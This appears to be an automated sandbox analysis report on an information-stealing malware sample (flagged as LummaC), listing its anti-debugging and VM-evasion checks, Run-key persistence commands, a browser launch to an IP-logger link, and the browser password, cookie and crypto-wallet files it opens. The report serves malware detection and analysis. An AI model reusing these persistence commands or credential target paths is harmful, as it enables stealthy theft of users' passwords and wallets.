                Source: C:\Users\Public\Netstat\dileapp.exe TID: 8132Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exe TID: 8128Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exe TID: 2084Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exe TID: 2084Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exe TID: 7668Thread sleep time: -150000s >= -30000sJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exe TID: 7668Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\Public\Netstat\dileapp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\Public\Netstat\dileapp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\Public\Netstat\dileapp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0079A273
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007AA537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_007AA537
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007AC8D5 VirtualQuery,GetSystemInfo,0_2_007AC8D5
                Source: dileapp.exe, dileapp.exe, 0000000F.00000002.2133477904.00000000011BB000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1650610820.00000000014F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: dileapp.exe, 0000000F.00000003.2132165164.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000002.2133135957.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132518246.0000000000EFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%
                Source: file.exe, 00000000.00000002.1650610820.00000000014F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: dileapp.exe, 00000005.00000002.1749018639.0000000001538000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000005.00000003.1740218351.0000000001576000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000005.00000002.1749018639.0000000001576000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000002.1969913350.000000000099C000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1969012358.000000000099C000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052375189.0000000001ABB000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052375189.0000000001A7F000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.2050545971.0000000001ABB000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.2050545971.0000000001A7F000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132165164.0000000000EBF000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132165164.0000000000EFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: dileapp.exe, 00000005.00000002.1749018639.000000000155A000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000005.00000003.1740218351.000000000155A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWj
                Source: file.exeBinary or memory string: vmCI$
                Source: dileapp.exe, 00000009.00000003.1969012358.000000000095F000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000002.1969913350.000000000095F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(p
                Source: dileapp.exe, 00000005.00000002.1748276179.00000000011BB000.00000040.00000001.01000000.00000009.sdmp, dileapp.exe, 00000009.00000002.1970769378.00000000011BB000.00000040.00000001.01000000.00000009.sdmp, dileapp.exe, 0000000C.00000002.2051325861.00000000011BB000.00000040.00000001.01000000.00000009.sdmp, dileapp.exe, 0000000F.00000002.2133477904.00000000011BB000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: dileapp.exe, 00000009.00000002.1969913350.000000000098F000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1969012358.000000000098F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%H
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-22647
                Source: C:\Users\Public\Netstat\dileapp.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\Public\Netstat\dileapp.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\Public\Netstat\dileapp.exeOpen window title or class name: regmonclass
                Source: C:\Users\Public\Netstat\dileapp.exeOpen window title or class name: gbdyllo
                Source: C:\Users\Public\Netstat\dileapp.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\Public\Netstat\dileapp.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\Public\Netstat\dileapp.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\Public\Netstat\dileapp.exeOpen window title or class name: ollydbg
                Source: C:\Users\Public\Netstat\dileapp.exeOpen window title or class name: filemonclass
                Source: C:\Users\Public\Netstat\dileapp.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: NTICE
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: SICE
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: SIWVID
                Source: C:\Users\Public\Netstat\dileapp.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007ADA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007ADA75
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B4A5A mov eax, dword ptr fs:[00000030h]0_2_007B4A5A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B8AAA GetProcessHeap,0_2_007B8AAA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007ADA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007ADA75
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B5B53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007B5B53
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007ADBC3 SetUnhandledExceptionFilter,0_2_007ADBC3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007ADD7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_007ADD7C
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" "Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Netstat\dileapp.exe C:\Users\Public\Netstat\dileapp.exeJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1tJFB4Jump to behavior
                Source: dileapp.exeBinary or memory string: ,}kProgram Manager
                Source: dileapp.exe, 00000009.00000002.1970769378.00000000011BB000.00000040.00000001.01000000.00000009.sdmp, dileapp.exe, 0000000F.00000002.2133477904.00000000011BB000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: ,}kProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007AD8CB cpuid 0_2_007AD8CB
                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_007A932F
                Source: C:\Users\Public\Netstat\dileapp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007AC131 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,0_2_007AC131
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079A8E0 GetVersionExW,0_2_0079A8E0
                Source: C:\Users\Public\Netstat\dileapp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: dileapp.exe, 00000009.00000003.1912623150.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1969012358.0000000000978000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000002.1969913350.0000000000978000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052375189.0000000001ABB000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.2050545971.0000000001A90000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.2009480307.0000000001B19000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.2050545971.0000000001ABB000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052375189.0000000001A90000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132165164.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132518246.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000002.2133135957.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\Public\Netstat\dileapp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                Source: C:\Users\Public\Netstat\dileapp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                Source: C:\Users\Public\Netstat\dileapp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: dileapp.exe PID: 7984, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dileapp.exe PID: 7568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dileapp.exe PID: 5448, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: dileapp.exe, 00000009.00000003.1888884625.0000000000A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ets/Electrum-LTCQN2
                Source: dileapp.exe, 00000009.00000003.1888860647.00000000009FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: dileapp.exe, 00000009.00000002.1970339338.0000000000A0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Libertyi
                Source: dileapp.exe, 00000009.00000003.1888860647.00000000009FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: dileapp.exe, 0000000F.00000003.2008902691.0000000000F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \\Exodus\\exodus{
                Source: dileapp.exe, 0000000C.00000003.1952649413.0000000001B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                Source: dileapp.exe, 0000000C.00000003.1900851363.0000000001B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Binance
                Source: dileapp.exe, 00000009.00000003.1888860647.00000000009FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: dileapp.exe, 0000000C.00000003.1952649413.0000000001B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: dileapp.exe, 0000000C.00000003.1952649413.0000000001B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: dileapp.exe, 0000000C.00000003.1926780706.0000000001B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
